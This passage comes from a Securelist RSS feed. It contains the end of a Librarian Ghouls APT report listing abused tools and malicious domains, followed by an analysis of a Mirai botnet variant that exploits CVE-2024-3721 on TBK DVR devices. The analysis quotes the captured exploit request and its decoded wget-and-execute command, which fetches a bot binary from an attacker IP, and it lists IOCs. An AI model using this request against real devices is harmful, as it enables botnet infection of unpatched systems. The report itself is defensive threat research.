  1627. <h3 id="legitimate-software">Legitimate software</h3>
  1628. <p><strong>AnyDesk</strong><br />
  1629. <strong>Blat</strong><br />
  1630. <strong>curl</strong><br />
  1631. <strong>Defender Control</strong><br />
  1632. <strong>Customized RAR 3.80</strong><br />
  1633. <strong>AnyDesk</strong><br />
  1634. <strong>Mipko Personal Monitor</strong><br />
  1635. <strong>ngrok</strong><br />
  1636. <strong>NirCmd</strong><br />
  1637. <strong>4t Tray Minimizer</strong><br />
  1638. <strong>WebBrowserPassView</strong></p>
  1639. <h3 id="librarian-ghouls-malicious-domains">Librarian Ghouls malicious domains</h3>
  1640. <p><a href="https://opentip.kaspersky.com/vniir.space/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9502c558d867a8d9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">vniir[.]space</a><br />
  1641. <a href="https://opentip.kaspersky.com/vniir.nl/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0e636fb1549d0169&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">vniir[.]nl</a><br />
  1642. <a href="https://opentip.kaspersky.com/hostingforme.nl/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e61fe25a8c34d281&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hostingforme[.]nl</a><br />
  1643. <a href="https://opentip.kaspersky.com/mail-cheker.nl/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bcd6467cb60e2786&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">mail-cheker[.]nl</a><br />
  1644. <a href="https://opentip.kaspersky.com/unifikator.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9d6a78151a150e26&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">unifikator[.]ru</a><br />
  1645. <a href="https://opentip.kaspersky.com/outinfo.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cd610dfe5d103022&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">outinfo[.]ru</a><br />
  1646. <a href="https://opentip.kaspersky.com/anyhostings.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e649e0fff731af9a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">anyhostings[.]ru</a><br />
  1647. <a href="https://opentip.kaspersky.com/center-mail.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5bfd54553a1d0b63&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">center-mail[.]ru</a><br />
  1648. <a href="https://opentip.kaspersky.com/redaction-voenmeh.info/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e9f97862db1b8839&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">redaction-voenmeh[.]info</a><br />
  1649. <a href="https://opentip.kaspersky.com/acountservices.nl/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______57ad99150fb110a9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">acountservices[.]nl</a><br />
  1650. <a href="https://opentip.kaspersky.com/accouts-verification.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3d341e06195a1983&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">accouts-verification[.]ru</a><br />
  1651. <a href="https://opentip.kaspersky.com/office-email.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e5330c8a0b58d099&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">office-email[.]ru</a><br />
  1652. <a href="https://opentip.kaspersky.com/email-office.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4b0edb6b5072f7d8&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">email-office[.]ru</a><br />
  1653. <a href="https://opentip.kaspersky.com/email-informer.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6a73727ef10b4d4c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">email-informer[.]ru</a><br />
  1654. <a href="https://opentip.kaspersky.com/office-account.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______024df3af7feb7539&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">office-account[.]ru</a><br />
  1655. <a href="https://opentip.kaspersky.com/deauthorization.online/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6094f2b128789861&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">deauthorization[.]online</a><br />
  1656. <a href="https://opentip.kaspersky.com/anyinfos.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______eb14d281d2bae0d7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">anyinfos[.]ru</a><br />
  1657. <a href="https://opentip.kaspersky.com/verifikations.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______94630862f2c5471a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">verifikations[.]ru</a><br />
  1658. <a href="https://opentip.kaspersky.com/claud-mail.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______909f7dce262e65b8&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">claud-mail[.]ru</a><br />
  1659. <a href="https://opentip.kaspersky.com/users-mail.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6d4e16f3513ebb6f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">users-mail[.]ru</a><br />
  1660. <a href="https://opentip.kaspersky.com/detectis.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4907f2ac6deda25b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">detectis[.]ru</a><br />
  1661. <a href="https://opentip.kaspersky.com/supersuit.site/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5b184f686761e976&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">supersuit[.]site</a><br />
  1662. <a href="https://opentip.kaspersky.com/downdown.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a3856fd4c7ccda85&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">downdown[.]ru</a><br />
  1663. <a href="https://opentip.kaspersky.com/dragonfires.ru/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a8e18d0157e42f0d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dragonfires[.]ru</a><br />
  1664. <a href="https://opentip.kaspersky.com/bmapps.org/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d0d3426800d0cc6e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">bmapps[.]org</a></p>
  1665. ]]></content:encoded>
  1667. <wfw:commentRss>https://securelist.com/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto/116536/feed/</wfw:commentRss>
  1668. <slash:comments>0</slash:comments>
  1671. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/27094643/librarian-ghouls-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  1672. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/27094643/librarian-ghouls-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1673. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/27094643/librarian-ghouls-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1674. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/27094643/librarian-ghouls-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1675. </item>
  1676. <item>
  1677. <title>Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721</title>
  1678. <link>https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/</link>
  1679. <comments>https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/#respond</comments>
  1681. <dc:creator><![CDATA[Anderson Leite]]></dc:creator>
  1682. <pubDate>Fri, 06 Jun 2025 10:00:38 +0000</pubDate>
  1683. <category><![CDATA[GReAT research]]></category>
  1684. <category><![CDATA[Botnets]]></category>
  1685. <category><![CDATA[Malware Technologies]]></category>
  1686. <category><![CDATA[Linux]]></category>
  1687. <category><![CDATA[Data Encryption]]></category>
  1688. <category><![CDATA[Vulnerabilities]]></category>
  1689. <category><![CDATA[Malware]]></category>
  1690. <category><![CDATA[Internet of Things]]></category>
  1691. <category><![CDATA[Mirai]]></category>
  1692. <category><![CDATA[Honeypot]]></category>
  1693. <category><![CDATA[CVE]]></category>
  1694. <category><![CDATA[RC4]]></category>
  1695. <category><![CDATA[Vulnerabilities and exploits]]></category>
  1696. <category><![CDATA[Secure environment (IoT)]]></category>
  1697. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116742</guid>
  1698.  
  1699. <description><![CDATA[Kaspersky GReAT experts describe the new features of a Mirai variant: the latest botnet infections target TBK DVR devices with CVE-2024-3721.]]></description>
  1700. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/06101530/mirai-botnet-dvr-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>The abuse of known security flaws to deploy bots on vulnerable systems is a widely recognized problem. Many automated bots constantly search the web for known vulnerabilities in servers and devices connected to the internet, especially those running popular services. These bots often carry Remote Code Execution (RCE) exploits targeting HTTP services, allowing attackers to embed Linux commands within GET or POST requests.</p>
  1701. <p>We recently observed the use of <a href="https://www.cve.org/CVERecord?id=CVE-2024-3721" target="_blank" rel="noopener">CVE-2024-3721</a> in attempts to deploy a bot in one of our honeypot services. This bot variant turned out to be part of the infamous <a href="https://securelist.com/tag/mirai/" target="_blank" rel="noopener">Mirai botnet</a>, targeting DVR-based monitoring systems. DVR devices are designed to record data from cameras, widely used by many manufacturers and can be managed remotely. In this article, we describe the new Mirai bot features and its revamped infection vector.</p>
  1702. <h2 id="exploitation">Exploitation</h2>
  1703. <p>During a review of the logs in our Linux honeypot system, we noticed an unusual request line linked to a <a href="https://github.com/netsecfish/tbk_dvr_command_injection" target="_blank" rel="noopener">CVE-2024-3721</a>. This vulnerability allows for the execution of system commands on TBK DVR devices without proper authorization as an entry point, using a specific POST request:</p>
  1704. <pre class="urvanov-syntax-highlighter-plain-tag">"POST /device.rsp?opt=sys&amp;cmd=___S_O_S_T_R_E_A_MAX___&amp;mdb=sos&amp;mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0"</pre> </p>
  1705. <p>The POST request contains a malicious command that is a single-line shell script which downloads and executes an ARM32 binary on the compromised machine.</p><pre class="urvanov-syntax-highlighter-plain-tag">cd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk</pre><p>
  1706. Typically, bot infections involve shell scripts that initially survey the target machine to determine its architecture and select the corresponding binary. However, in this case, since the attack is specifically targeted at devices that only support ARM32 binaries, the reconnaissance stage is unnecessary.</p>
  1707. <h2 id="malware-implant-mirai-variant">Malware implant – Mirai variant</h2>
  1708. <p>The source code of the Mirai botnet was published on the internet nearly a decade ago, and since then, it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking.</p>
  1709. <p>The DVR bot is also based on the Mirai source code but it includes different features as well, such as string encryption using RC4, anti-VM checks, and anti-emulation techniques. We&#8217;ve already covered Mirai <a href="https://securelist.com/tag/mirai/" target="_blank" rel="noopener">in many posts</a>, so we&#8217;ll focus on the new features of this specific variant.</p>
  1710. <h3 id="data-decryption">Data decryption</h3>
  1711. <p>The data decryption routine in this variant is implemented as a simple RC4 algorithm.</p>
  1712. <p>The RC4 key is encrypted with XOR. After the key decryption, we were able to obtain its value: <code>6e7976666525a97639777d2d7f303177</code>.</p>
  1713. <p>The decrypted RC4 key is used to decrypt the strings. After each piece of data is decrypted, it is inserted into a vector of a custom <code>DataDecrypted</code> structure, which is a simple string list:</p>
  1714. <div id="attachment_116743" style="width: 648px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225225/mirai-botnet-variant1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116743" class="size-full wp-image-116743" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225225/mirai-botnet-variant1.png" alt="Data decryption routine" width="638" height="313" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225225/mirai-botnet-variant1.png 638w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225225/mirai-botnet-variant1-300x147.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225225/mirai-botnet-variant1-571x280.png 571w" sizes="auto, (max-width: 638px) 100vw, 638px" /></a><p id="caption-attachment-116743" class="wp-caption-text">Data decryption routine</p></div>
  1715. <p>The global linked list with decrypted data is accessed whenever the malware needs particular strings.</p>
  1716. <div id="attachment_116744" style="width: 432px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225307/mirai-botnet-variant2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116744" class="size-full wp-image-116744" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225307/mirai-botnet-variant2.png" alt="Adding decrypted strings to the global list" width="422" height="137" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225307/mirai-botnet-variant2.png 422w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225307/mirai-botnet-variant2-300x97.png 300w" sizes="auto, (max-width: 422px) 100vw, 422px" /></a><p id="caption-attachment-116744" class="wp-caption-text">Adding decrypted strings to the global list</p></div>
  1717. <h3 id="anti-vm-and-anti-emulation">Anti-VM and anti-emulation</h3>
  1718. <p>To detect if it is currently running inside a virtual machine or QEMU, the malware lists all processes until it finds any mention of VMware or QEMU-arm. Listing running processes is simply a matter of opening the <code>/proc</code> directory, which is the proc filesystem on Linux.</p>
  1719. <p>Each process ID (PID) has its own folder containing useful information, such as <code>cmdline</code>, which describes the command used to start the process. Using this information, the malware verifies if there are any processes with <code>VMware</code> or <code>QEMU-arm</code> in their command line.</p>
  1720. <div id="attachment_116745" style="width: 938px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116745" class="size-full wp-image-116745" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3.png" alt="Process check" width="928" height="391" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3.png 928w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-300x126.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-768x324.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-831x350.png 831w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-740x312.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-665x280.png 665w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225351/mirai-botnet-variant3-800x337.png 800w" sizes="auto, (max-width: 928px) 100vw, 928px" /></a><p id="caption-attachment-116745" class="wp-caption-text">Process check</p></div>
  1721. <p>The implant also verifies if the bot process is running outside an expected directory, based on a hardcoded list of allowed ones:</p>
  1722. <div id="attachment_116746" style="width: 584px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116746" class="size-full wp-image-116746" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4.png" alt="Allowed directories" width="574" height="406" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4.png 574w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4-300x212.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4-495x350.png 495w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/05225457/mirai-botnet-variant4-396x280.png 396w" sizes="auto, (max-width: 574px) 100vw, 574px" /></a><p id="caption-attachment-116746" class="wp-caption-text">Allowed directories</p></div>
  1723. <p>Once those checks are successfully completed, Mirai will continue normal execution, preparing the vulnerable device for receiving commands from the operator.</p>
  1724. <h2 id="infection-statistics">Infection statistics</h2>
  1725. <p>According to our telemetry data, the majority of infected victims are located in countries such as China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. It&#8217;s challenging to ascertain the exact number of vulnerable and infected devices globally. However, by analyzing public sources, we&#8217;ve identified over 50,000 exposed DVR devices online, indicating that attackers have numerous opportunities to target unpatched, vulnerable devices.</p>
  1726. <h2 id="conclusion">Conclusion</h2>
  1727. <p>Exploiting known security flaws in IoT devices and servers that haven&#8217;t been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect.</p>
  1728. <p>The main goal of such bots is to carry out attacks that overwhelm websites and services (DDoS attacks). Most of these bots don&#8217;t stay active after the device restarts because some device firmware doesn&#8217;t allow changes to the file system. To protect against infections like these, we recommend updating vulnerable devices as soon as security patches become available. Another thing to consider is a factory reset if your device is indeed vulnerable and exposed.</p>
  1729. <p>All Kaspersky products detect the threat as <code>HEUR:Backdoor.Linux.Mirai</code> and <code>HEUR:Backdoor.Linux.Gafgyt</code>.</p>
  1730. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1731. <p><strong>Host-based (MD5 hashes)</strong><br />
  1732. <a href="https://opentip.kaspersky.com/011a406e89e603e93640b10325ebbdc8/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______f0c4906b4cdb8bd9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">011a406e89e603e93640b10325ebbdc8</a><br />
  1733. <a href="https://opentip.kaspersky.com/24fd043f9175680d0c061b28a2801dfc/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______d9f75555b66e25ce&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">24fd043f9175680d0c061b28a2801dfc</a><br />
  1734. <a href="https://opentip.kaspersky.com/29b83f0aae7ed38d27ea37d26f3c9117/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______de351ecfc5cc6255&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">29b83f0aae7ed38d27ea37d26f3c9117</a><br />
  1735. <a href="https://opentip.kaspersky.com/2e9920b21df472b4dd1e8db4863720bf/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______d6d3ab3b7d689423&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2e9920b21df472b4dd1e8db4863720bf</a><br />
  1736. <a href="https://opentip.kaspersky.com/3120a5920f8ff70ec6c5a45d7bf2acc8/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______fb8f11741ffbe775&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3120a5920f8ff70ec6c5a45d7bf2acc8</a><br />
  1737. <a href="https://opentip.kaspersky.com/3c2f6175894bee698c61c6ce76ff9674/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______d18a79d85d871852&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">3c2f6175894bee698c61c6ce76ff9674</a><br />
  1738. <a href="https://opentip.kaspersky.com/45a41ce9f4d8bb2592e8450a1de95dcc/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______edebd28d4cd2fb17&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">45a41ce9f4d8bb2592e8450a1de95dcc</a><br />
  1739. <a href="https://opentip.kaspersky.com/524a57c8c595d9d4cd364612fe2f057c/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______c49d05fb4c1d61e9&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">524a57c8c595d9d4cd364612fe2f057c</a><br />
  1740. <a href="https://opentip.kaspersky.com/74dee23eaa98e2e8a7fc355f06a11d97/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______d50e770ec5b7910b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">74dee23eaa98e2e8a7fc355f06a11d97</a><br />
  1741. <a href="https://opentip.kaspersky.com/761909a234ee4f1d856267abe30a3935/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______3fa4a9a7f774a397&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">761909a234ee4f1d856267abe30a3935</a><br />
  1742. <a href="https://opentip.kaspersky.com/7eb3d72fa7d730d3dbca4df34fe26274/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______81e1fcf82d063d19&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">7eb3d72fa7d730d3dbca4df34fe26274</a><br />
  1743. <a href="https://opentip.kaspersky.com/8a3e1176cb160fb42357fa3f46f0cbde/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______783ded1476502019&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8a3e1176cb160fb42357fa3f46f0cbde</a><br />
  1744. <a href="https://opentip.kaspersky.com/8d92e79b7940f0ac5b01bbb77737ca6c/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______5c5e190643415517&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8d92e79b7940f0ac5b01bbb77737ca6c</a><br />
  1745. <a href="https://opentip.kaspersky.com/95eaa3fa47a609ceefa24e8c7787bd99/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______a128e7b68c5e9472&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">95eaa3fa47a609ceefa24e8c7787bd99</a><br />
  1746. <a href="https://opentip.kaspersky.com/96ee8cc2edc8227a640cef77d4a24e83/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______275622b4301ab1ad&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">96ee8cc2edc8227a640cef77d4a24e83</a><br />
  1747. <a href="https://opentip.kaspersky.com/aaf34c27edfc3531cf1cf2f2e9a9c45b/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______cb4c5c9f720a8c81&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">aaf34c27edfc3531cf1cf2f2e9a9c45b</a><br />
  1748. <a href="https://opentip.kaspersky.com/ba32f4eef7de6bae9507a63bde1a43aa/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______b65badd92d7a2007&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">ba32f4eef7de6bae9507a63bde1a43aa</a><br />
  1749. <strong>IPs</strong><br />
  1750. <a href="https://opentip.kaspersky.com/116.203.104.203/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______c4aa7f299869ced3&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">116.203.104[.]203</a><br />
  1751. <a href="https://opentip.kaspersky.com/130.61.64.122/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______00397413eca49d8c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">130.61.64[.]122</a><br />
  1752. <a href="https://opentip.kaspersky.com/161.97.219.84/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______be3106adbfef064c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">161.97.219[.]84</a><br />
  1753. <a href="https://opentip.kaspersky.com/130.61.69.123/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______ba92c0517080150c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">130.61.69[.]123</a><br />
  1754. <a href="https://opentip.kaspersky.com/185.84.81.194/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______4efb0269c4998d3c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">185.84.81[.]194</a><br />
  1755. <a href="https://opentip.kaspersky.com/54.36.111.116/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______701804d4121ffb15&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">54.36.111[.]116</a><br />
  1756. <a href="https://opentip.kaspersky.com/192.3.165.37/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______35ccb669922032d5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">192.3.165[.]37</a><br />
  1757. <a href="https://opentip.kaspersky.com/162.243.19.47/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______25f5659fa40c1ed5&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">162.243.19[.]47</a><br />
  1758. <a href="https://opentip.kaspersky.com/63.231.92.27/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______db1e0ce1d1e07022&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">63.231.92[.]27</a><br />
  1759. <a href="https://opentip.kaspersky.com/80.152.203.134/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______0ecd60affda8929f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">80.152.203[.]134</a><br />
  1760. <a href="https://opentip.kaspersky.com/42.112.26.36/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______00291183d81d4fd7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">42.112.26[.]36</a></p>
  1761. ]]></content:encoded>
  1763. <wfw:commentRss>https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/feed/</wfw:commentRss>
  1764. <slash:comments>0</slash:comments>
  1767. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/06101530/mirai-botnet-dvr-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  1768. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/06101530/mirai-botnet-dvr-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
